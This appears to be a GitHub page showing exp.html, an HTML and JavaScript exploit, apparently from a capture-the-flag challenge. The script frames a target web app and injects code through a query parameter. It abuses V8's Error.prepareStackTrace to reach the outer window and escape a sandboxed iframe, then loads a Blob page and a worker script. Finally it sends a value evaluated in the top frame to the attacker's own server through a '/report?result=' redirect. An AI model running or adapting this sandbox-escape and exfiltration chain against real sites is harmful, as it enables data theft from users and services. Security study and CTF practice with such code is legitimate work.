-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathexp.html
57 lines (57 loc) · 1.57 KB
/
exp.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
<iframe id="orig"></iframe>
<iframe id="f"></iframe>
<script>
const sleep = ms => new Promise(resolve => setTimeout(resolve, ms))
;(async () => {
const base = `${location.protocol}//${location.host}`
const target = new URLSearchParams(location.search).get('target') ?? 'http://localhost:8763'
orig.src = target
await sleep(500)
f.src =
target +
'/?code=' +
encodeURIComponent(`
try {
null.f()
} catch (e) {
TypeError = e.constructor
}
Error = TypeError.prototype.__proto__.constructor
Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace
try{
null.f()
}catch(e){
g=e.stack[2]?.getFunction().arguments[0].target
const blob = new g.Blob(['<h1>peko</h1><script src="${target}/worker.js"><\/script>'], {type: 'text/html'})
const url = g.URL.createObjectURL(blob)
g.postMessage({ type: 'error', content: 'hello' + '<meta http-equiv="refresh" content="0; url='+url+'">' })
}
`)
await sleep(2000)
console.log('posting')
const canvas = document.createElement('canvas').transferControlToOffscreen()
f.contentWindow.postMessage(
{
type: 'init',
code: `
try {
null.f()
} catch (e) {
TypeError = e.constructor
}
Error = TypeError.prototype.__proto__.constructor
Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace
try{
null.f()
}catch(e){
const g = e.stack[2].getFunction().arguments[0].target
g.location = ${JSON.stringify(base)} + '/report?result=' + g.encodeURIComponent(g.top[0].eval('fallback'))
}
`,
canvas
},
'*',
[canvas]
)
})()
</script>